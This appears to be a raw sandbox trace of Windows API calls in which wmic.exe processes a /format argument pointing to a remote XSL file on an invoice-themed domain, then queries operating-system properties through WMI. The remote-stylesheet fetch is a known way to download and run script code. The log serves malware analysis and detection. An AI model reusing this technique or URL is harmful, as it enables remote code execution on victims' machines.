[0058.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="?", cchCount2=1) returned 3
[0058.992] lstrlenW (lpString="VALUE") returned 5
[0058.992] lstrlenW (lpString="format") returned 6
[0058.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="VALUE", cchCount2=5) returned 1
[0058.992] lstrlenW (lpString="ALL") returned 3
[0058.992] lstrlenW (lpString="format") returned 6
[0058.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="ALL", cchCount2=3) returned 3
[0058.992] lstrlenW (lpString="FORMAT") returned 6
[0058.992] lstrlenW (lpString="format") returned 6
[0058.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="FORMAT", cchCount2=6) returned 2
[0058.992] lstrlenW (lpString="/") returned 1
[0058.992] lstrlenW (lpString=":") returned 1
[0058.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2="/", cchCount2=1) returned 3
[0058.992] lstrlenW (lpString="-") returned 1
[0058.992] lstrlenW (lpString=":") returned 1
[0058.992] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2="-", cchCount2=1) returned 3
[0058.993] lstrlenW (lpString=":") returned 1
[0058.993] lstrlenW (lpString=":") returned 1
[0058.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2=":", cchCount2=1) returned 2
[0058.993] lstrlenW (lpString="/") returned 1
[0058.993] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount1=67, lpString2="/", cchCount2=1) returned 3
[0058.993] lstrlenW (lpString="-") returned 1
[0058.993] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount1=67, lpString2="-", cchCount2=1) returned 3
[0058.994] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.994] lstrlenW (lpString="CSV") returned 3
[0058.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 1
[0058.994] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.994] lstrlenW (lpString="HFORM") returned 5
[0058.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 1
[0058.994] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.994] lstrlenW (lpString="HTABLE") returned 6
[0058.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 1
[0058.994] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.994] lstrlenW (lpString="LIST") returned 4
[0058.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.994] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.994] lstrlenW (lpString="MOF") returned 3
[0058.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.994] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.994] lstrlenW (lpString="RAWXML") returned 6
[0058.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.994] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.994] lstrlenW (lpString="TABLE") returned 5
[0058.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.994] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.994] lstrlenW (lpString="VALUE") returned 5
[0058.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="VALUE", cchCount1=5, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.994] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.994] lstrlenW (lpString="XML") returned 3
[0058.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XML", cchCount1=3, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.994] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="htable-sortby") returned 13
[0058.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="htable-sortby", cchCount1=13, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 1
[0058.995] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="htable-sortby.xsl") returned 17
[0058.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="htable-sortby.xsl", cchCount1=17, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 1
[0058.995] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="texttablewsys") returned 13
[0058.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="texttablewsys", cchCount1=13, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.995] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="texttablewsys.xsl") returned 17
[0058.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="texttablewsys.xsl", cchCount1=17, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.995] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="wmiclimofformat") returned 15
[0058.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclimofformat", cchCount1=15, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.995] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="wmiclimofformat.xsl") returned 19
[0058.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclimofformat.xsl", cchCount1=19, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.995] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="wmiclitableformat") returned 17
[0058.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformat", cchCount1=17, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.995] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="wmiclitableformat.xsl") returned 21
[0058.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformat.xsl", cchCount1=21, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.995] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="wmiclitableformatnosys") returned 22
[0058.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformatnosys", cchCount1=22, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.995] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="wmiclitableformatnosys.xsl") returned 26
[0058.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformatnosys.xsl", cchCount1=26, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.995] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.995] lstrlenW (lpString="wmiclivalueformat") returned 17
[0058.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclivalueformat", cchCount1=17, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.996] lstrlenW (lpString="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 67
[0058.996] lstrlenW (lpString="wmiclivalueformat.xsl") returned 21
[0058.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclivalueformat.xsl", cchCount1=21, lpString2="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641", cchCount2=67) returned 3
[0058.996] ??0CHString@@QAE@PBG@Z () returned 0xcf3dc
[0058.996] ?Right@CHString@@QBE?AV1@H@Z () returned 0xcf3e0
[0058.996] ??0CHString@@QAE@PBG@Z () returned 0xcf3e4
[0058.996] _wcsicmp (_String1="8641", _String2=".xsl") returned 10
[0058.996] SysStringLen (param_1="http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641") returned 0x43
[0058.996] SysStringLen (param_1=".xsl") returned 0x4
[0058.996] ??1CHString@@QAE@XZ () returned 0x820001
[0058.996] ??1CHString@@QAE@XZ () returned 0x7e0001
[0058.996] ??1CHString@@QAE@XZ () returned 0x1
[0058.997] GetCurrentThreadId () returned 0xa9c
[0058.997] ??0CHString@@QAE@XZ () returned 0xcf458
[0058.997] memmove_s (in: _Destination=0x7f4e8, _DestinationSize=0x8, _Source=0x7f528, _SourceSize=0x8 | out: _Destination=0x7f4e8) returned 0x0
[0058.997] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0058.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x891f7c, cbMultiByte=-1, lpWideCharStr=0x7f538, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0058.997] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0058.997] SysStringLen (param_1="os") returned 0x2
[0058.997] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='os") returned 0x1e
[0058.997] SysStringLen (param_1="'") returned 0x1
[0058.998] IWbemServices:GetObject (in: This=0x49c74c, strObjectPath="MSFT_CliAlias.FriendlyName='os'", lFlags=0, pCtx=0x0, ppObject=0xcf430*=0x0, ppCallResult=0x0 | out: ppObject=0xcf430*=0x4bc508, ppCallResult=0x0) returned 0x0
[0059.016] IWbemClassObject:Get (in: This=0x4bc508, wszName="Formats", lFlags=0, pVal=0xcf398*(varType=0x0, wReserved1=0xc, wReserved2=0x3ea3, wReserved3=0x758f, varVal1=0x28da80, varVal2=0xcf384), pType=0x0, plFlavor=0x0 | out: pVal=0xcf398*(varType=0x200d, wReserved1=0xc, wReserved2=0x3ea3, wReserved3=0x758f, varVal1=0x276858*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x29ced8, rgsabound=((cElements=0x7, lLbound=0))), varVal2=0xcf384), pType=0x0, plFlavor=0x0) returned 0x0
[0059.018] lstrlenW (lpString="SET") returned 3
[0059.018] lstrlenW (lpString="get") returned 3
[0059.018] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0059.018] SafeArrayGetLBound (in: psa=0x276858, nDim=0x1, plLbound=0xcf404 | out: plLbound=0xcf404) returned 0x0
[0059.018] SafeArrayGetUBound (in: psa=0x276858, nDim=0x1, plUbound=0xcf3cc | out: plUbound=0xcf3cc) returned 0x0
[0059.019] SafeArrayGetElement (in: psa=0x276858, rgIndices=0xcf42c, pv=0xcf438 | out: pv=0xcf438) returned 0x0
[0059.019] IWbemClassObject:Get (in: This=0x4bea48, wszName="Name", lFlags=0, pVal=0xcf3b8*(varType=0x0, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1=0x897f73, varVal2=0x7ed68), pType=0x0, plFlavor=0x0 | out: pVal=0xcf3b8*(varType=0x8, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1="STATUS", varVal2=0x7ed68), pType=0x0, plFlavor=0x0) returned 0x0
[0059.019] lstrlenW (lpString="FULL") returned 4
[0059.019] lstrlenW (lpString="STATUS") returned 6
[0059.019] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STATUS", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
[0059.019] IUnknown:Release (This=0x4bea48) returned 0x1
[0059.019] SafeArrayGetElement (in: psa=0x276858, rgIndices=0xcf42c, pv=0xcf438 | out: pv=0xcf438) returned 0x0
[0059.019] IWbemClassObject:Get (in: This=0x4bfcc8, wszName="Name", lFlags=0, pVal=0xcf3b8*(varType=0x0, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1=0x29ce14, varVal2=0x7ed68), pType=0x0, plFlavor=0x0 | out: pVal=0xcf3b8*(varType=0x8, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1="FREE", varVal2=0x7ed68), pType=0x0, plFlavor=0x0) returned 0x0
[0059.019] lstrlenW (lpString="FULL") returned 4
[0059.019] lstrlenW (lpString="FREE") returned 4
[0059.019] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FREE", cchCount1=4, lpString2="FULL", cchCount2=4) returned 1
[0059.020] IUnknown:Release (This=0x4bfcc8) returned 0x1
[0059.020] SafeArrayGetElement (in: psa=0x276858, rgIndices=0xcf42c, pv=0xcf438 | out: pv=0xcf438) returned 0x0
[0059.020] IWbemClassObject:Get (in: This=0x4cc600, wszName="Name", lFlags=0, pVal=0xcf3b8*(varType=0x0, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1=0x29ce14, varVal2=0x7ed68), pType=0x0, plFlavor=0x0 | out: pVal=0xcf3b8*(varType=0x8, wReserved1=0xffff, wReserved2=0x98da, wReserved3=0x7570, varVal1="FULL", varVal2=0x7ed68), pType=0x0, plFlavor=0x0) returned 0x0
[0059.020] lstrlenW (lpString="FULL") returned 4
[0059.020] lstrlenW (lpString="FULL") returned 4
[0059.020] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FULL", cchCount1=4, lpString2="FULL", cchCount2=4) returned 2
[0059.020] IWbemClassObject:Get (in: This=0x4cc600, wszName="Properties", lFlags=0, pVal=0xcf388*(varType=0x0, wReserved1=0x0, wReserved2=0xed68, wReserved3=0x7, varVal1=0xacb2, varVal2=0x1), pType=0x0, plFlavor=0x0 | out: pVal=0xcf388*(varType=0x200d, wReserved1=0x0, wReserved2=0xed68, wReserved3=0x7, varVal1=0x276888*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x272858, rgsabound=((cElements=0x33, lLbound=0))), varVal2=0x1), pType=0x0, plFlavor=0x0) returned 0x0
[0059.025] SafeArrayGetLBound (in: psa=0x276888, nDim=0x1, plLbound=0xcf3a8 | out: plLbound=0xcf3a8) returned 0x0
[0059.025] SafeArrayGetUBound (in: psa=0x276888, nDim=0x1, plUbound=0xcf3dc | out: plUbound=0xcf3dc) returned 0x0
[0059.025] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.025] IWbemClassObject:Get (in: This=0x21d9110, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x0, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1=0x757098da, varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="BootDevice", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.025] IWbemClassObject:Get (in: This=0x21d9110, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x0, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1=0xcf3bc, varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="BootDevice", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.025] lstrlenW (lpString="BootDevice") returned 10
[0059.025] lstrlenW (lpString="XBRSEWYL") returned 8
[0059.025] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XBRSEWYL", cchCount1=8, lpString2="BootDevice", cchCount2=10) returned 3
[0059.025] lstrlenW (lpString="BootDevice") returned 10
[0059.025] lstrlenW (lpString="freephysicalmemory") returned 18
[0059.025] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="freephysicalmemory", cchCount1=18, lpString2="BootDevice", cchCount2=10) returned 3
[0059.025] IUnknown:Release (This=0x21d9110) returned 0x1
[0059.025] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.025] IWbemClassObject:Get (in: This=0x21d9560, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="BootDevice", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="BuildNumber", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.026] IWbemClassObject:Get (in: This=0x21d9560, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="BootDevice", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="BuildNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.026] lstrlenW (lpString="BuildNumber") returned 11
[0059.026] lstrlenW (lpString="XBRSEWYL") returned 8
[0059.026] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XBRSEWYL", cchCount1=8, lpString2="BuildNumber", cchCount2=11) returned 3
[0059.026] lstrlenW (lpString="BuildNumber") returned 11
[0059.026] lstrlenW (lpString="freephysicalmemory") returned 18
[0059.026] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="freephysicalmemory", cchCount1=18, lpString2="BuildNumber", cchCount2=11) returned 3
[0059.026] IUnknown:Release (This=0x21d9560) returned 0x1
[0059.026] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.026] IWbemClassObject:Get (in: This=0x21d9970, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="BuildNumber", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="BuildType", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.026] IWbemClassObject:Get (in: This=0x21d9970, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="BuildNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="BuildType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.027] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.027] IWbemClassObject:Get (in: This=0x21da1e8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="BuildType", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="CodeSet", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.027] IWbemClassObject:Get (in: This=0x21da1e8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="BuildType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="CodeSet", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.027] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.027] IWbemClassObject:Get (in: This=0x21da6c8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="CodeSet", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="CountryCode", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.027] IWbemClassObject:Get (in: This=0x21da6c8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="CodeSet", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="CountryCode", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.027] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.027] IWbemClassObject:Get (in: This=0x21dabd0, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="CountryCode", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="CSDVersion", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.028] IWbemClassObject:Get (in: This=0x21dabd0, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="CountryCode", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="CSDVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.028] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.028] IWbemClassObject:Get (in: This=0x21daf20, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="CSDVersion", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.028] IWbemClassObject:Get (in: This=0x21daf20, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="CSDVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="CSName", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.028] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.028] IWbemClassObject:Get (in: This=0x21db358, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.028] IWbemClassObject:Get (in: This=0x21db358, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="CSName", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="CurrentTimeZone", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.028] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.028] IWbemClassObject:Get (in: This=0x21db8f8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Debug", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.029] IWbemClassObject:Get (in: This=0x21db8f8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="CurrentTimeZone", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Debug", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.029] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.029] IWbemClassObject:Get (in: This=0x21dbd60, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Debug", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.029] IWbemClassObject:Get (in: This=0x21dbd60, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Debug", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Description", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.029] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
